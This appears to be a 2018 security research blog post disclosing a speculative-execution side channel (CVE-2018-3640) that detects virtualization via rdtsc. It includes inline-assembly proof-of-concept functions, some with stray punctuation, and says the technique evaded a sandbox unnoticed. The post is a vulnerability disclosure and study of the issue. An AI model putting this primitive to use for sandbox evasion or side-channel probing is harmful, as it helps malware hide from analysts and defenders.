Rumata888 May 22, 2018 at 15:55

New attack technique based on Meltdown. Using speculative instructions to detect virtualization

The Meltdown attack has opened a new class of attacks on processors that use architectural states to transmit information. But the speculative execution, which was first used to attack Meltdown, allows not only to execute the code with the removal of restrictions, but also to find out certain details of the processor. We have found a new way to implement attacks using architectural states. It allows you to detect virtualization based on how the processor chooses whether to send speculative execution instructions or not. We reported this method to Intel, and on May 21, 2018, a vulnerability alert “Q2 2018 Speculative Execution Side Channel Update” was issued , in which our vulnerability CVE-2018-3640 or Specter Variant 3a is present.

1. Introduction

The attack is based on a side cache channel similar to the Meltdown attack. As you know, Meltdown uses speculative execution to access memory, which should not be available without special privileges. The attack in question differs from Meltdown in that it does not use a cache access time threshold. This is possible because the processor executes certain instructions in advance to speed up code execution. Meltdown utilizes readings from attacker-controlled buffers in speculative execution such that the attacker can use memory access time measurements as a side channel.

2. Virtualization

VT-x technology in Intel processors allows the hypervisor to choose whether VMEXIT (context switching to the hypervisor) will occur when certain instructions, such as rdtsc, are executed. Most virtualization environments in the standard configuration configure rdtsc interception by default. So do, for example, Virtualbox, VMware, Hyper-V, Parallels on the hypervisor from Apple and from Parallels. Since VMEXIT actually means context switching, the instructions that generate VMEXIT take longer to execute than if they were executed in a non-virtualized environment.

3. Attack

A buffer of several pages is created. Then, instead of speculative access to memory areas, in order to obtain data, the rdtsc instruction is speculatively executed and the result of its execution is used to access a certain part of the previously allocated buffer. In speculative execution, only a certain part of the allocated buffer is accessed, which makes it possible to distinguish speculative access cases from random errors. After completion of the function containing speculative code execution, the page number of the memory with the lowest access time is added to the statistics. Then, the cache is flushed throughout the buffer. The following are the functions that are used to trigger speculative execution and memory access in 32-bit versions of Windows:

_declspec(naked) void herring() {         //Эта функция используется для
 __asm {                                  //срабатывания спекулятивного
         xorps xmm0, xmm0                 //исполнения в функции speculate 
         sqrtpd xmm0, xmm0
         sqrtpd xmm0, xmm0
         sqrtpd xmm0, xmm0
         sqrtpd xmm0, xmm0
         sqrtpd xmm0, xmm0 
         sqrtpd xmm0, xmm0 
         sqrtpd xmm0, xmm0 
         sqrtpd xmm0, xmm0
         movd eax, xmm0
         lea esp, [esp+eax+4]
         ret
    }
}
_declspec(naked) void __fastcall speculate(const char* detector) {
      __asm {                   //Эта функция спекулятивно исполняет rdtsc и
           mfence.              //обращается к странице, соответствующей 
           mov esi, ecx.        //возвращенному rdtsc значению                                
           call herring           
           rdtsc.               //Эти инструкции
           and eax, 7.          //исполняются спекулятивно
           or eax, 32.                      //*
           shl eax, 12.                     //*
           movzx eax, byte ptr [esi+eax]    //*
     }
}

To successfully implement the attack, these steps must be repeated to find the distribution of cached pages. It is necessary to perform as many repetitions as it takes to get enough statistics: during the test described, 10,000 iterations were used. Then the number of misses past the selected memory region is calculated. In virtualized environments where rdtsc interception is enabled, the percentage of such misses is between 50 and 99 percent. On non-virtualized systems, it is less than one percent. This information is presented in the figure below (the darker the region of memory, the more hits it is recorded). For testing, macOS, Ubuntu, Debian, and Windows were used as non-virtualized systems, and Ubuntu, Debian, and Windows were used as guest systems.

Distribution of cached pages in different environments

4. Description of the attack

The attack uses speculative execution of instructions to force the processor to disclose rdtsc execution information. In a non-virtualized environment, rdtsc is executed on the processor itself, which simply returns a counter. In a virtualized environment where the “RDTSC exiting” bit is set to MSR IA32_VMX_PINBASED_CTLS, rdtsc is essentially a context switch that takes too long.

At the time of the vulnerability, the available internal documentation of Intel processors did not contain data that would accurately explain what was happening. We have two assumptions: either the processor decides that rdtsc will run for too long and does not execute it until the execution flow reaches it directly, or all instructions that invoke VMEXIT are not executed speculatively. In a non-virtualized environment, rdtsc instructions immediately following it are executed speculatively, but this does not happen in a virtualized environment.

5. Conclusions and directions for future research

The described attack uses a new caching technique based on Meltdown to create a side channel, which instead of accessing privileged memory regions reveals information about the processor operating mode. All known methods for detecting virtualization are highly dependent on the use of the rdtsc instruction as a timer, which allows a smart hypervisor to trick these methods by substituting return values. Such an attack can also be limited, but if you make small changes to the code, then replacing the time from the side of the hypervisor will not be able to affect the result. Perhaps we will publish PoC of this version later.
We can conclude that in virtualized environments with rdtsc intercepted variation of the described attack allows us to determine the presence of virtualization, and in the absence of interception, it is possible to use previously known methods, for example, the method of measuring the speed of work with TLB caches.

This attack allows you to quickly and easily detect virtualization in environments with standard settings or in environments that intentionally use rdtsc interception to protect themselves from virtualization detection. This attack was successfully tested on a virtualized sandbox: experts discovered the sandbox without betraying itself.

PoC code can be found at the link

Tags: